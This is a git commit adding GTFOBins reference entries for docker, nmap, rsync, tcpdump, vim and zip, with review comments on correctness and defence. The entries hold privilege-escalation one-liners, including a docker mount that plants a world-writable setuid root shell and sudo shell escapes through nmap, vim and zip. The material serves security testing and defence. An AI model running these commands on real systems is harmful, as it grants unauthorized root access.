add new ways

AlessandroZ 2018-08-17 17:16:09 +02:00
parent 6b73dcf283
commit 7219385a05
6 changed files with 64 additions and 0 deletions

7
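--- /dev/null
+++ b/_gtfobins/docker.md
@@ -0,0 +1,7 @@
+---
+functions:
+execute-interactive:
+- code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+sudo-enabled:
+- code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+---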
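Review bot: Both `code` lines leave a world-writable setuid-root copy of bash (`chmod 4777`) in the user's home directory, and nothing in the entry says so or states the precondition. I would add a YAML comment above `functions:` such as `# requires access to the Docker daemon (docker group or sudo), which is root-equivalent; remove ~/rootshell after testing`, and use mode `4755` so the leftover file is not writable by every local user. The final `~/rootshell -p` also assumes `/home/${USER}` is the caller's home directory, which does not hold on every system. For defenders the takeaway worth recording is that docker group membership should be audited like sudo rights, and that host bind mounts and newly created setuid files are the artefacts to alert on.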

9
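--- /dev/null
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,9 @@
+---
+functions:
+execute-non-interactive:
+- code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+nmap --script=/tmp/script.nse
+sudo-enabled:
+- code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+sudo nmap --script=/tmp/script.nse
+---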
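Review bot: The script is written to the fixed path `/tmp/script.nse` and then loaded by `sudo nmap`, so on a shared host the file that root ends up reading is not guaranteed to be the one this entry created; rsync.md, tcpdump.md and zip.md use the fixed names `/tmp/tmpfile` and `/tmp/run.sh` in the same way. Creating the file with `TF=$(mktemp)` and passing `$TF` avoids the predictable name. Separately, the two-command `code` values here and in those three files are plain scalars, whereas vim.md uses `- code: |`. Unless the indentation lost in this rendering says otherwise, YAML folds the line break into a space and the two commands render as one line, so `- code: |` is the safer form.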

9
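--- /dev/null
+++ b/_gtfobins/rsync.md
@@ -0,0 +1,9 @@
+---
+functions:
+execute-non-interactive:
+- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+sudo-enabled:
+- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+---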

9
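--- /dev/null
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,9 @@
+---
+functions:
+execute-non-interactive:
+- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+sudo-enabled:
+- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+---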
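Review bot: The payload is written to `/tmp/tmpfile` but `-z ./tmpfile` is resolved against the current directory, so the entry only behaves as written when it is run from `/tmp`; using the same absolute path on both lines removes that unstated assumption. `-i eth0` is likewise host-specific and would be better marked as a placeholder for the local interface name. The first variant is listed without sudo yet passes `-Z root`, which presumably only has an effect when tcpdump already runs privileged, so it probably wants a comment stating when it applies.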

19
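--- /dev/null
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+execute-interactive:
+- code: vim -c ':!/bin/sh'
+- code: |
+vim
+:set shell=/bin/sh
+:shell
+file-write:
+- code: |
+vim file_to_write
+w
+file-read:
+- code: vim file_to_read
+suid-enabled:
+- code: ./vim -c ':!/bin/sh -p'
+sudo-enabled:
+- code: sudo vim -c ':!/bin/sh'
+---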
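Review bot: In the `file-write` example the second step is a bare `w`, while the other Ex commands in this file carry the leading colon (`:set shell=/bin/sh`, `:shell`). Typed in normal mode, `w` is a cursor motion and writes nothing, so the step should read `:w`. The example also never enters any text, so as written it would save an unchanged buffer; the entry should say that the buffer is edited before the write.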

11
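--- /dev/null
+++ b/_gtfobins/zip.md
@@ -0,0 +1,11 @@
+---
+functions:
+execute-interactive:
+- code: echo "/bin/sh" > /tmp/run.sh
+chmod +x /tmp/run.sh
+zip z.zip * -T -TT /tmp/run.sh
+sudo-enabled:
+- code: echo "/bin/sh" > /tmp/run.sh
+chmod +x /tmp/run.sh
+sudo zip z.zip * -T -TT /tmp/run.sh
+---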
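Review bot: `zip z.zip * ...` depends on whatever the current directory holds: the unquoted `*` must match at least one file, any name beginning with `-` is parsed as an option, and `z.zip` is left behind afterwards. Naming one known file and a temporary archive path would make the entry deterministic and easier to clean up. The function is labelled `execute-interactive`, while nmap.md files the same `/bin/sh` payload under `execute-non-interactive`; one of the two labels should change so the categories stay consistent.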